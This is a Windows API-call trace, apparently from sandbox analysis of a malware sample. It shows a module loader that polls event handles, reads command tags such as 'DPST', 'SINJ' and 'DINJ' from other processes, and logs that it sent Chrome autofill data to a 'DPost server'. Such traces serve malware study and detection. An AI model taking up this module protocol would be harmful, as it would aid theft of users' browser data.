	[0223.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.019] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.019] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.019] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.019] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0223.019] Sleep (dwMilliseconds=0xbb8) 
	[0223.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.034] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.034] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.035] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.035] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0223.035] Sleep (dwMilliseconds=0xbb8) 
	[0223.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.050] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.050] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.051] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.051] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0223.051] Sleep (dwMilliseconds=0xbb8) 
	[0223.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.065] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.065] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.065] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.065] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0223.065] Sleep (dwMilliseconds=0xbb8) 
	[0223.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.081] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.081] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.081] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.081] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0223.081] Sleep (dwMilliseconds=0xbb8) 
	[0223.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.097] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.097] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.097] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0223.097] Sleep (dwMilliseconds=0xbb8) 
	[0223.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.112] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.112] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.112] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.112] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0223.112] Sleep (dwMilliseconds=0xbb8) 
	[0223.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fc0
	[0223.137] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.137] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0223.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225968
	[0223.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26cfba8
	[0223.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0223.137] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0223.137] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1aff734, lpBuffer=0x225968, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225968*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0223.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0223.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0223.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x22ff930, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0223.138] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x39a050, lpBuffer=0x26cfba8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26cfba8*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0223.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cfba8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56
	[0223.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225c10
	[0223.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cfba8, cbMultiByte=-1, lpWideCharStr=0x225c10, cchWideChar=56 | out: lpWideCharStr="Successfully sent autofill data to DPost server: Chrome") returned 56
	[0223.138] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1aff624, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0223.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0223.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737fe8
	[0223.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x2737fe8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0223.138] SetEvent (hEvent=0x49c) returned 1
	[0223.143] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225968) returned 1
	[0223.143] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cfba8) returned 1
	[0223.143] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0223.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738010
	[0223.143] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0223.143] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0223.143] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0223.143] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0223.143] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0223.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffdc8
	[0223.143] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2737fc0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x810) returned 0x5ac
	[0223.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738038
	[0223.144] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.144] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738038) returned 1
	[0223.144] Sleep (dwMilliseconds=0xbb8) 
	[0223.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738038
	[0223.159] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.159] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.159] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.159] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738038) returned 1
	[0223.159] Sleep (dwMilliseconds=0xbb8) 
	[0223.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c68
	[0223.174] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.174] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.174] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.175] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c68) returned 1
	[0223.175] Sleep (dwMilliseconds=0xbb8) 
	[0223.190] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c68
	[0223.190] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.190] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.190] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c68) returned 1
	[0223.190] Sleep (dwMilliseconds=0xbb8) 
	[0223.206] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c68
	[0223.207] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0223.207] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0223.207] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x24d5b0
	[0223.207] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0223.207] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0223.207] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225b88, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b88*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0223.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0223.207] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff5d0
	[0223.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x22ff5d0, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0223.207] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x24d5b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x24d5b0, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0223.207] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0223.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0223.207] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c90
	[0223.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x2777c90, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0223.207] SetEvent (hEvent=0x474) returned 1
	[0223.207] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0223.207] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d5b0) returned 1
	[0223.207] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0223.207] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777cb8
	[0223.207] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0223.207] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0223.207] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0223.207] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0223.208] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0223.208] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff888
	[0223.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2777c68, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd34) returned 0x53c
	[0223.208] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777ce0
	[0223.208] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.208] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.208] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777ce0) returned 1
	[0223.208] Sleep (dwMilliseconds=0xbb8) 
	[0223.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.221] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.221] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.221] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.221] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.221] Sleep (dwMilliseconds=0xbb8) 
	[0223.237] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.237] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.237] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.237] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.238] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.238] Sleep (dwMilliseconds=0xbb8) 
	[0223.252] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.252] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.253] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.253] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.253] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.253] Sleep (dwMilliseconds=0xbb8) 
	[0223.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.269] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.269] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.269] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.269] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.269] Sleep (dwMilliseconds=0xbb8) 
	[0223.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.284] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.284] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.284] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.284] Sleep (dwMilliseconds=0xbb8) 
	[0223.300] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.301] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.301] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.301] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.301] Sleep (dwMilliseconds=0xbb8) 
	[0223.315] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.316] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.316] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.316] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.316] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.316] Sleep (dwMilliseconds=0xbb8) 
	[0223.330] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.330] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.330] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.330] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.330] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.330] Sleep (dwMilliseconds=0xbb8) 
	[0223.346] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.346] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.346] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.346] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.346] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.346] Sleep (dwMilliseconds=0xbb8) 
	[0223.361] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.361] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.361] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.362] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.362] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.362] Sleep (dwMilliseconds=0xbb8) 
	[0223.378] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.378] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.378] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.379] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.379] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.379] Sleep (dwMilliseconds=0xbb8) 
	[0223.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.393] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.393] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.393] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.393] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.393] Sleep (dwMilliseconds=0xbb8) 
	[0223.411] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.411] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.411] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.411] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.411] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.411] Sleep (dwMilliseconds=0xbb8) 
	[0223.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.424] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.424] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.424] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.424] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.424] Sleep (dwMilliseconds=0xbb8) 
	[0223.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.452] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.452] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.452] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.452] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.452] Sleep (dwMilliseconds=0xbb8) 
	[0223.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.455] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.455] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.455] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.455] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.455] Sleep (dwMilliseconds=0xbb8) 
	[0223.471] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.471] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.471] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.471] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.471] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.471] Sleep (dwMilliseconds=0xbb8) 
	[0223.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.486] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.487] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.487] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.487] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.487] Sleep (dwMilliseconds=0xbb8) 
	[0223.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.503] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.503] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.503] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.503] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.503] Sleep (dwMilliseconds=0xbb8) 
	[0223.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.519] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.519] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.519] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.519] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.519] Sleep (dwMilliseconds=0xbb8) 
	[0223.580] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.580] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.580] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.580] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.580] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.580] Sleep (dwMilliseconds=0xbb8) 
	[0223.627] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.627] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.627] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.627] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.627] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.627] Sleep (dwMilliseconds=0xbb8) 
	[0223.659] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.659] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.659] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.659] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.659] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.660] Sleep (dwMilliseconds=0xbb8) 
	[0223.674] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.674] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0223.674] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0223.674] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0223.675] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783c0) returned 1
	[0223.675] Sleep (dwMilliseconds=0xbb8) 
	[0223.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27783c0
	[0223.690] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0223.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0223.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x24d5b0
	[0223.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225968
	[0223.690] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
